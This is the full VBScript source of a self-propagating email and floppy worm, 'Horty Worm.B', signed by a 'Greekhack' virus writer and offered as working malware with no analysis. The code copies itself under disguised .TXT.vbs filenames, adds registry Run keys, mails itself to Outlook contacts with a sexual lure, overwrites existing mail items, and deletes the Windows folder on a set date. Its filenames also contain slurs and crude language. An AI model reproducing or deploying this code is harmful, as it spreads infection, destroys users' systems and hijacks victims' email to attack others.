Horty Worm.B by kagra
---------------------

on error resume next
set wscriptshell=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")

fullname=wscript.scriptfullname

str=mid(fullname,1,2)
if str="A:" or str="B:" then
fso.copyfile fullname,"c:\TARANTINO.TXT.vbs"
wscriptshell.run "wscript.exe c:\TARANTINO.TXT.vbs"
wscript.quit
end if

maila="Have you ever seen Angelina Jolie in extremely hot scenes?"
mailb="You cannot imagine the pleasure,unless you check the attachment."
mailc="I'll get in touch with you again soon..."
mailbody=maila&chr(13)&chr(10)&mailb&chr(13)&chr(10)&mailc&chr(13)&chr(10)

set boota=fso.getspecialfolder(0)
startboot=boota&"\ANGELINA-JOLIE-MEGAFUCK.TXT.vbs"
bootaa=boota&"\kernelDLL.vbs"
bootb=boota&"\PING-PONG.TXT.vbs"
bootc=boota&"\BLOWJOB.TXT.vbs"
bootd=boota&"\DANCE-WITH-THE-DEVIL.TXT.vbs"
boote=boota&"\MATRIX2-THEME.TXT.vbs"
bootf=boota&"\SPIDER-MAN-THE-MOVIE.TXT.vbs"
bootg=boota&"\THE-GIFT.TXT.vbs"
booth=boota&"\x-MEN.TXT.vbs"
booti=boota&"\IRON-MAIDEN-ARE-DEAD.TXT.vbs"
bootj=boota&"\METALLICA-NEW-ALBUM.TXT.vbs"
bootk=boota&"\THE-MUMMY-RETURNS.TXT.vbs"
set unboot=fso.getspecialfolder(1)
unbootstart=unboot&"\Winkernel.vbs"
unboota=unboot&"\LORD-OF-THE-RINGS-3.TXT.vbs"
unbootb=unboot&"\BRAD-PITT-IS-GAY.TXT.vbs"
unbootc=unboot&"\FUCK-THIS-CORPSE.TXT.vbs"
unbootd=unboot&"\AAAARRRGGGHH.TXT.vbs"
unboote=unboot&"\THIS-IS-MY-LAST-HOUR.TXT.vbs"
unbootf=unboot&"\BLACK-SABBATH.TXT.vbs"
unbootg=unboot&"\LARA-CROFT-BLOWJOB.TXT.vbs"
unbooth=unboot&"\MICROSOFT-BEEN-HACKED.TXT.vbs"
unbooti=unboot&"\WIN98-SUPERCRASH.TXT.vbs"
unbootg=unboot&"\ATTENTION!!!.TXT.vbs"

fso.copyfile wscript.scriptfullname,unbootstart
fso.copyfile wscript.scriptfullname,startboot
fso.copyfile wscript.scriptfullname,bootaa
fso.copyfile wscript.scriptfullname,bootb
fso.copyfile wscript.scriptfullname,bootc
fso.copyfile wscript.scriptfullname,bootd
fso.copyfile wscript.scriptfullname,boote
fso.copyfile wscript.scriptfullname,bootf
fso.copyfile wscript.scriptfullname,bootg
fso.copyfile wscript.scriptfullname,booth
fso.copyfile wscript.scriptfullname,booti
fso.copyfile wscript.scriptfullname,bootj
fso.copyfile wscript.scriptfullname,bootk
fso.copyfile wscript.scriptfullname,unboota
fso.copyfile wscript.scriptfullname,unbootb
fso.copyfile wscript.scriptfullname,unbootc
fso.copyfile wscript.scriptfullname,unbootd
fso.copyfile wscript.scriptfullname,unboote
fso.copyfile wscript.scriptfullname,unbootf
fso.copyfile wscript.scriptfullname,unbootg
fso.copyfile wscript.scriptfullname,unbooth
fso.copyfile wscript.scriptfullname,unbooti
fso.copyfile wscript.scriptfullname,unbootg

if month(now)=5 and day(now)=11 then
msgbox "GATE ONE:YOUR PC CAUGHT A THROAT",64,"AAATSUUU!!!"
end if

if month(now)=5 and day(now)=12 then
msgbox "GATE TWO:YOUR PC IS NOW STONED",64,"OH MAMA,I'M DOOMED!"
end if

wscriptshell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdated","wscript.exe"&" "&bootaa&" "&"%"
wscriptshell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernel32","wscript.exe"&" "&unbootstart&" "&"%"

if month(now)=5 and day(now)=15 then
msgbox "GATE THREE:GREETINGZ MORTAL,ART THOU READY TO DIE?",64,"!ONLY EVIL LIVES HERE!"
end if

if month(now)=5 and day(now)=16 then
fso.deletefolder boota,true
end if

if month(now)=5 and day(now)=17 then
msgbox "You aRe OuT oF DanGer,U LuCky Gay!--->FROM THE GREEKHACK virus writer",64,"GREEKHACK virus ver 6.1"
end if

mass()

b=1

tim=minute(time)
tim=tim+6

set thisscript=fso.opentextfile(wscript.scriptfullname,1)
thiscode=thisscript.readall
thisscript.close

do

timstandard=minute(time)
if tim>53 then
tim=01
end if

if timstandard=tim then
tim=minute(time)
tim=tim+6

if b=1 then
floppya="a:\WAKE-UP-DEAD-MAN.TXT.vbs"
floppyb="b:\WAKE-UP-DEAD-MAN.TXT.vbs"
floppy()
end if

if b=2 then
floppya="a:\LORD-OF-THE-RINGS-2.TXT.vbs"
floppyb="b:\LORD-OF-THE-RINGS-2.TXT.vbs"
floppy()
end if

if b=3 then
floppya="a:\READY-TO-DIE.TXT.vbs"
floppyb="b:\READY-TO-DIE.TXT.vbs"
floppy()
end if

if b=4 then
floppya="a:\FUCK.TILL.DEATH.TXT.vbs"
floppyb="b:\FUCK.TILL.DEATH.TXT.vbs"
floppy()
end if

if b=5 then
floppya="a:\AFRICA-GAY.TXT.vbs"
floppyb="b:\AFRICA-GAY.TXT.vbs"
floppy()
end if

if b=6 then
floppya="a:\YOU-HAVE-AIDS.TXT.vbs"
floppyb="b:\YOU-HAVE-AIDS.TXT.vbs"
floppy()
end if

if b=7 then
floppya="a:\NOTHING-ELSE-MATTERS.TXT.vbs"
floppyb="b:\NOTHING-ELSE-MATTERS.TXT.vbs"
floppy()
end if

if b=8 then
floppya="a:\KYLIE-MINOGUE.TXT.vbs"
floppyb="b:\KYLIE-MINOGUE.TXT.vbs"
floppy()
end if


if b=9 then
floppya="a:\BILL-GATES-SMASHES-ALL.TXT.vbs"
floppyb="b:\BILL-GATES-SMASHES-ALL.TXT.vbs"
floppy()
end if

if b=10 then
floppya="a:\SHIT-HAPPENS.TXT.vbs"
floppyb="b:\SHIT-HAPPENS.TXT.vbs"
floppy()
end if

if errornumbersss>0 then
b=b-1
err.clear
end if
 b=b+1
if b=11 then
b=1
end if
end if
loop


function mass()
on error resume next
set out=createobject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")

set newitem=mapi.getdefaultfolder(6)


do while newitem.items.count<>0

for each item in newitem.items

do while item.Attachments.count<>0
for each itatt in item.Attachments
itatt.Delete
next
loop
item.Subject="Check this!"
item.body=mailbody

item.Attachments.Add startboot

item.send
next
loop
set item=Nothing
set ittat=Nothing




set newitem=Nothing
set newitem=mapi.getdefaultfolder(5)


do while newitem.items.count<>0

for each item in newitem.items

do while item.Attachments.count<>0
for each itatt in item.Attachments
itatt.Delete
next
loop
item.Subject="Check this!"
item.body=mailbody

item.Attachments.Add startboot

item.send
next
loop
set item=Nothing
set ittat=Nothing


set newitem=Nothing
set newitem=mapi.getdefaultfolder(3)


do while newitem.items.count<>0

for each item in newitem.items

do while item.Attachments.count<>0
for each itatt in item.Attachments
itatt.Delete
next
loop
item.Subject="Check this!"
item.body=mailbody

item.Attachments.Add startboot

item.send
next
loop
set item=Nothing
set ittat=Nothing

set newitem=Nothing
set newitem=mapi.getdefaultfolder(10)

for each item in newitem.items
set mailitem=out.createitem(0)
set email=item
mailitem.to=email
mailitem.Subject="Check this!"
mailitem.Body=mailbody
mailitem.Attachments.Add startboot
mailitem.send
next

set newitem=Nothing
end function




function floppy()
on error resume next
set repla=fso.createtextfile(floppya,true)
errornumbersss=err.number
repla.write thiscode
repla.close
set repla=Nothing

set replb=fso.createtextfile(floppyb,true)
replb.write thiscode
replb.close
set replb=Nothing
floppya=""
floppyb=""
end function


'From the Greekhack virus writer,Greece,version 6.1
'Greedinz to:Arkouda,Xaralabo,Angel,Byzantium Athan....
